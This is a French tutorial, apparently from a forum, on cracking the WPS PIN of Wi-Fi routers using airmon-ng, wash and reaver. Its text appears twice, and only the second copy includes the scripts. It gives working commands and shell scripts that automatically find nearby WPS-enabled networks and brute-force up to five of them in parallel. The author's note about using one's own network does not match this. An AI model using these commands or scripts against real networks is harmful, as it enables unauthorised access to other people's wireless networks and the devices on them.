Tutoriel sur le crack wifi WPS
Wi-Fi Protected Setup (WPS) est un standard de réseau local sans fil simple et sécurisé. Conçu par la Wi-Fi Alliance, il a été lancé début 2007.
Le but du protocole WPS est de simplifier la phase de configuration de la sécurité des réseaux sans fil1. Il permet à des particuliers ayant peu de connaissances sur la sécurité de configurer un accès WPA, supporté par les appareils Wi-Fi.
Ce standard met l'accent sur l'utilisabilité et la sécurité, et le concept se décline en quatre façons d'établir un réseau domestique. L'utilisateur voulant ajouter un périphérique au réseau peut utiliser au choix :
1. la méthode PIN (Personal Identification Number), un numéro à lire sur une étiquette (ou un écran) du nouvel appareil, et à reporter sur le « représentant » du réseau (le point d'accès ou le registrar).
2. la méthode PBC, où l'utilisateur presse un bouton (physique ou virtuel), à la fois sur le point d'accès et sur le nouvel appareil.
3. la méthode NFC, où l'utilisateur approche le nouvel appareil du point d'accès pour établir une communication en champ proche entre eux.
4. la méthode USB (Comme D-link le fait pour la plupart des clés usb wifi), où l'utilisateur se sert d'une clé USB pour transférer les données entre le nouvel appareil et le point d'accès.
Seules les trois premières méthodes (PIN/PBC/NFC) ont obtenu la Wi-Fi Protected Setup Certification[réf. nécessaire].
Une grave vulnérabilité de la méthode PIN a été démontrée le 26 décembre 2011 par Stefan Viehböck2,3. Bien que la publication présentant la vulnérabilité ne contient pas de code source, elle a permis à d'autres développeurs d'écrire et publier une implémentation de l'attaque4.
Dans ce tuto nous apprendrons comment brute forcer ce code PIN pour obtenir rapidement un accès au réseau wifi.
Outils nécessaires :
Une carte wifi capable de se mettre en mode monitoring
Reaver (logiciel installé par défaut dans Backtrack)
Wash (logiciel installé par défaut dans Backtrack)
Un réseau wifi qui vous appartiens avec le WPS d'activé
Un paire de main
Étape 1 :
Passer sa carte en mode monitoring
airmon-ng start wlan0
Maintenant lorsque vous faite un ifconfig vous devez avoir une nouvelle interface nommé mon0
Étape 2 : Rechercher notre réseau wifi et voir si le WPS est actif
Pour cela nous allons utiliser l'outil wash :
wash -o mac.txt -i mon0
le -o va servir à envoyer le résultat dans le fichier mac.txt (il se crée si il n'existe pas)
le -i va servir a dire sur quel interface lancer la recherche de réseau wifi avec le WPS actif.
Vous devriez avoir quelque chose de similaire dans votre fichier
wash.png
Dans mon cas j'utiliserais l'adresse mac 00:25:15:5F:E1:XX de ma Neufbox
Étape 3 : Bruteforce du code PIN de notre borne wifi
Pour cela nous allons utiliser l'outil reaver :
reaver -i mon0 -a -vv -b 00:25:15:5F:E1:XX
le -i va servir a dire sur quel interface lancer la recherche de réseau wifi avec le WPS actif.
le -a va servir à choisir le mode le plus adapté pour brute forcer le code PIN
le -vv va servir à avoir un mode vraiment vraiment verbeux (il nous raconte toute sa vie en détail ^^)
le -b va servir à choisir l'adresse mac à attaquer.
Il va essayer au fur et a mesure les différents code PIN jusqu'à trouver le précieux.
reaver 1.jpg
reaver 2.jpg
J'espère que ce tuto vous aura fait découvrir de nouveau outils.
Pour ceux que qui serait intéressé par une automatisation , j'ai développé un script (il vaut ce qu'il vaut)
Dans le premier fichier autrocrack.sh
Dans le deuxième fichier wash.sh
Dans le troisième fichier boucle.sh
Si vous avez compris le fonctionnement du dernier fichier vous devrez créer les fichiers boucle2.sh jusqu'à boucle5.sh
Reprenez uniquement le dernier code est incrémenter de 1 la dernière variable.
exemple pour boucle2.sh nous aurons uniquement la ligne
reaver -i mon0 -a -vv -b $var2 qui sera modifié
Pour les définitions je tiens mes sources de wikipédia et pour le tuto je me suis appuyer sur le site k0n1k
Je reste à votre entière disposition pour vos questions.
Wi-Fi Protected Setup (WPS) est un standard de réseau local sans fil simple et sécurisé. Conçu par la Wi-Fi Alliance, il a été lancé début 2007.
Le but du protocole WPS est de simplifier la phase de configuration de la sécurité des réseaux sans fil1. Il permet à des particuliers ayant peu de connaissances sur la sécurité de configurer un accès WPA, supporté par les appareils Wi-Fi.
Ce standard met l'accent sur l'utilisabilité et la sécurité, et le concept se décline en quatre façons d'établir un réseau domestique. L'utilisateur voulant ajouter un périphérique au réseau peut utiliser au choix :
1. la méthode PIN (Personal Identification Number), un numéro à lire sur une étiquette (ou un écran) du nouvel appareil, et à reporter sur le « représentant » du réseau (le point d'accès ou le registrar).
2. la méthode PBC, où l'utilisateur presse un bouton (physique ou virtuel), à la fois sur le point d'accès et sur le nouvel appareil.
3. la méthode NFC, où l'utilisateur approche le nouvel appareil du point d'accès pour établir une communication en champ proche entre eux.
4. la méthode USB (Comme D-link le fait pour la plupart des clés usb wifi), où l'utilisateur se sert d'une clé USB pour transférer les données entre le nouvel appareil et le point d'accès.
Seules les trois premières méthodes (PIN/PBC/NFC) ont obtenu la Wi-Fi Protected Setup Certification[réf. nécessaire].
Une grave vulnérabilité de la méthode PIN a été démontrée le 26 décembre 2011 par Stefan Viehböck2,3. Bien que la publication présentant la vulnérabilité ne contient pas de code source, elle a permis à d'autres développeurs d'écrire et publier une implémentation de l'attaque4.
Dans ce tuto nous apprendrons comment brute forcer ce code PIN pour obtenir rapidement un accès au réseau wifi.
Outils nécessaires :
Une carte wifi capable de se mettre en mode monitoring
Reaver (logiciel installé par défaut dans Backtrack)
Wash (logiciel installé par défaut dans Backtrack)
Un réseau wifi qui vous appartiens avec le WPS d'activé
Un paire de main
Étape 1 :
Passer sa carte en mode monitoring
airmon-ng start wlan0
Maintenant lorsque vous faite un ifconfig vous devez avoir une nouvelle interface nommé mon0
Étape 2 : Rechercher notre réseau wifi et voir si le WPS est actif
Pour cela nous allons utiliser l'outil wash :
wash -o mac.txt -i mon0
le -o va servir à envoyer le résultat dans le fichier mac.txt (il se crée si il n'existe pas)
le -i va servir a dire sur quel interface lancer la recherche de réseau wifi avec le WPS actif.
Vous devriez avoir quelque chose de similaire dans votre fichier
wash.png
Dans mon cas j'utiliserais l'adresse mac 00:25:15:5F:E1:XX de ma Neufbox
Étape 3 : Bruteforce du code PIN de notre borne wifi
Pour cela nous allons utiliser l'outil reaver :
reaver -i mon0 -a -vv -b 00:25:15:5F:E1:XX
le -i va servir a dire sur quel interface lancer la recherche de réseau wifi avec le WPS actif.
le -a va servir à choisir le mode le plus adapté pour brute forcer le code PIN
le -vv va servir à avoir un mode vraiment vraiment verbeux (il nous raconte toute sa vie en détail ^^)
le -b va servir à choisir l'adresse mac à attaquer.
Il va essayer au fur et a mesure les différents code PIN jusqu'à trouver le précieux.
reaver 1.jpg
reaver 2.jpg
J'espère que ce tuto vous aura fait découvrir de nouveau outils.
Pour ceux que qui serait intéressé par une automatisation , j'ai développé un script (il vaut ce qu'il vaut)
Dans le premier fichier autrocrack.sh
Code:
echo Passage de la carte wlan0 en mode monitoring airmon-ng start wlan0 echo ________________________________________________ echo Recherche des Reseaux potentiellement crackable echo gnome-terminal -e ./wash.sh sleep 1 gnome-terminal -e ./boucle.sh sleep 5 gnome-terminal -e ./boucle2.sh sleep 5 gnome-terminal -e ./boucle3.sh sleep 5 gnome-terminal -e ./boucle4.sh sleep 5 gnome-terminal -e ./boucle5.sh sleep 60
Code:
wash -omac.txt -i mon0 | grep -o -E "([0-9a-fA-F]{2}\:){5}[0-9a-fA-F]{2}" mac.txt >mac2.txt sleep 60
Code:
compteur=0 while read line do compteur=$((compteur+1)) var="var${compteur}" export $var="$line" done < mac2.txt reaver -i mon0 -a -vv -b $var1
Reprenez uniquement le dernier code est incrémenter de 1 la dernière variable.
exemple pour boucle2.sh nous aurons uniquement la ligne
reaver -i mon0 -a -vv -b $var2 qui sera modifié
Pour les définitions je tiens mes sources de wikipédia et pour le tuto je me suis appuyer sur le site k0n1k
Je reste à votre entière disposition pour vos questions.
Commentaire